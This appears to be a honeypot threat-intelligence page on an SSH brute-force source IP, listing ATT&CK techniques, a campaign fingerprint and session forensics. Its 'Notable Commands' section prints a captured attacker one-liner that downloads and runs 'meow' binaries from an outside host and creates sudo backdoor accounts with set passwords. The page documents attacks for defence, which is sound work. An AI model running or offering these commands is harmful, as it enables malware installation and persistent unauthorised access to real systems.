← Back to feed

34.11.41.120

TAGGED SUSPICIOUS how we decide →

Threat Confidence

57%

Location

🇺🇸 US / Washington

ASN

AS396982 · Google LLC

Cloud Provider

—

Total Events

108

Above average by volume

Agent Count

First / Last Seen

2026-05-31 13:23 — 2026-05-31 13:25

Attack Types

ssh:bruteforce

MITRE ATT&CK Techniques

Reconnaissance

T1595 T1595.002

Initial Access

T1078

Execution

T1059.004

Defense Evasion

T1070.004

Credential Access

T1110 T1110.001

Discovery

T1046

Command and Control

T1105

External Corroboration

Blocklist.de

Reported 2026-05-31 14:02

blocklist_de:reported

Campaigns

HASSH 16443846184e… — SSH-2.0-Go (97 IPs, 22 countries) HASSH Active high 🇺🇸 US

97 IPs 70606 events

mysql:bruteforcessh:bruteforce

2026-02-22 — ongoing · 97 IPs are running an identical SSH client (HASSH fingerprint 16443846184e…). Top network: Network Solutions, LLC (AS19871). Geographic …

Session Forensics

scanner ×2 malware_dropper ×1 credential_probe ×13

Sessions

16 (1 with login)

Avg Depth Score

0.24

Commands Executed

Files Downloaded

Notable Commands

echo 'qwerty' | sudo -S sh -c 'cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.11.136.102/meow; curl -O http://34.11.136.102/meow; chmod 777 meow; ./meow; wget http://34.11.136.102/meowarm64; curl -O http://34.11.136.102/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):qwerty > /tmp/mew' 2>/dev/null || (cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.11.136.102/meow; curl -O http://34.11.136.102/meow; chmod 777 meow; ./meow; wget http://34.11.136.102/meowarm64; curl -O http://34.11.136.102/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd; useradd -m -s /bin/bash admin1; echo admin1:modzmodz | chpasswd; usermod -aG sudo admin1; useradd -m -s /bin/bash user1; echo user1:modzmodz | chpasswd; echo -n $(whoami):qwerty > /tmp/mew)
whoami
cd /tmp
ulimit -n 1020000
rm -rf meow*
wget http://34.11.136.102/meow
curl -O http://34.11.136.102/meow
chmod 777 meow
./meow

Fingerprints

HASSH

16443846184eafde36765c9bab2f4397

SSH Client

SSH-2.0-Go

Evidence Timeline

Credential Probe 1fae89162573 newark_01 · 2026-05-31 13:23

1 20%

Loading events...

Malware Dropper c24233630af3 newark_01 · 2026-05-31 13:23

26 1 1 100%

Loading events...

Credential Probe 22888cf52e9f newark_01 · 2026-05-31 13:23

1 20%

Loading events...

Credential Probe cfe7b20a4134 newark_01 · 2026-05-31 13:23

1 20%

Loading events...

Credential Probe 9383c6437157 newark_01 · 2026-05-31 13:23

1 20%

Loading events...

Credential Probe e56cc28d0242 newark_01 · 2026-05-31 13:23

1 20%

Loading events...

Credential Probe 975692ec1531 newark_01 · 2026-05-31 13:23

1 20%

Loading events...

Credential Probe dca499b4b7ab newark_01 · 2026-05-31 13:23

1 20%

Loading events...

Credential Probe a8ec2314b5bf newark_01 · 2026-05-31 13:23

1 20%

Loading events...

Credential Probe 38ac40fb54b3 newark_01 · 2026-05-31 13:23

1 20%

Loading events...

Credential Probe d2ef9f01edbb newark_01 · 2026-05-31 13:23

1 20%

Loading events...

Credential Probe b7272f8d423f newark_01 · 2026-05-31 13:23

1 20%

Loading events...

Credential Probe 2ad3967a4335 newark_01 · 2026-05-31 13:23

1 20%

Loading events...

Credential Probe e8943bb4aca0 newark_01 · 2026-05-31 13:23

1 20%

Loading events...

Scanner e75fcf2d6298 newark_01 · 2026-05-31 13:23

15%

Loading events...

Scanner 61332a346e42 newark_01 · 2026-05-31 13:23

15%

Loading events...